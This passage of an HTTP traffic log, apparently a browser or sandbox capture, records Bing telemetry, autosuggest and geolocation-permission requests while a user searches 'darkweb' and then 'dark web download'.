TS%22%3A1733306932128%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932138%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932139%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306932165%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22878.999999986263%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221791.9999999867287%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306932171%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932244%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225559.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935230,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

HTTP Request

GET https://www.bing.com/rp/J_o2maogFDeUOsovPJL-ofEuxJ4.gif

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306935494,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/NosrlR4amKTs1zYxWy3laZN3HRk.svg

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225560.1%22,%22TS%22:1733306936047,%22DU%22:763,%22THLT%22:262,%22RCLT%22:null,%22MOS%22:4717,%22MOT%22:763,%22IsMT%22:1,%22VPST%22:388,%22VDT%22:388,%22MaxVPT%22:763,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306936251,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938253,%22HType%22:%22d2%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225561.1%22,%22TS%22:1733306938331,%22DU%22:2281,%22THLT%22:240,%22RCLT%22:null,%22MOS%22:5483,%22MOT%22:2281,%22IsMT%22:1,%22VPST%22:352,%22VDT%22:353,%22MaxVPT%22:2281,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Hover%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22Name%22:%22VidCaption%22,%22TS%22:1733306938548,%22HType%22:%22h%22,%22FID%22:%22VideoAnswer%22,%22TType%22:0}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.RichHover.Summary%22,%22AppNS%22:%22SERP%22,%22K%22:%225562.1%22,%22TS%22:1733306939154,%22DU%22:820,%22THLT%22:254,%22RCLT%22:null,%22MOS%22:7767,%22MOT%22:820,%22IsMT%22:1,%22VPST%22:325,%22VDT%22:325,%22MaxVPT%22:820,%22SCNT%22:0,%22MMSTLT%22:null,%22IsMMT%22:0,%22MuteCNT%22:0,%22Mute%22:1,%22IFLT%22:null,%22IFSCT%22:null}&log=UserEvent

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb&cp=7&csr=1&zis=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20&cp=8&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306943075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943079%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22AsResponseLength%22%3A%22390%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306943185%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Cig%3A225FA5CBA999466DB7F89B91073D9FF2%22%2C%22AnswerInfo%22%3A%22HS%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306943199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306943972%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A13601%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306943974%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20d&cp=9&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943977%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22AsResponseLength%22%3A%22395%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%2Cig%3A6C384D4A2FBD488E9AF7AA19361A9E67%22%2C%22AnswerInfo%22%3A%22SS%3B21%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306944064%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A8%2C%20%5C%22GL%5C%22%3A13%2C%20%5C%22IG%5C%22%3A%5C%226C384D4A2FBD488E9AF7AA19361A9E67%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306944077%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306945355%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306945361%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22AsResponseLength%22%3A%22693%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%2Cig%3AA25C00CFF6AE4E4F8E05C979C0ADBEF7%22%2C%22AnswerInfo%22%3A%22CT%3B16%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306945474%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/th?id=OSK.26b33f47e15c5c5164fa04635e0f303e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306947016}&log=UserEvent

HTTP Request

GET https://www.bing.com/fd/ls/GLinkPing.aspx?IG=A25C00CFF6AE4E4F8E05C979C0ADBEF7&ID=autosuggest,5004.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1541}

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A7%2C%20%5C%22IG%5C%22%3A%5C%22A25C00CFF6AE4E4F8E05C979C0ADBEF7%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%20web%20download%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306947014%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:11,%22BC%22:368,%22SE%22:-1,%22TC%22:-1,%22H%22:381,%22BP%22:444,%22CT%22:445,%22IL%22:4},%22ad%22:[43,196,1263,601,1263,2832,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306947612%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A512%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947621%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947622%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947624%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=46DB1346077049719FA2E2E87EA23DEA&iid=.5097&ptn=Web&ep=0&iconpl=1

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947635%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A844%2C%22time%22%3A847%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306947863%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A848%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947864%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A849%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947865%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=46DB1346077049719FA2E2E87EA23DEA

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=46DB1346077049719FA2E2E87EA23DEA&IID=SERP.5063&q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

HTTP Request

GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

GET https://www.bing.com/aes/c.gif?type=mv&tids=23,25,27,29&rg=454c2bcc9fc941d18efa929d627c9e96&reqver=1.0

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a4c5fc14ff08d3cba4e30517d13%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306947882%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306947898%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947916%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306948110%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306948124%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306948134%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

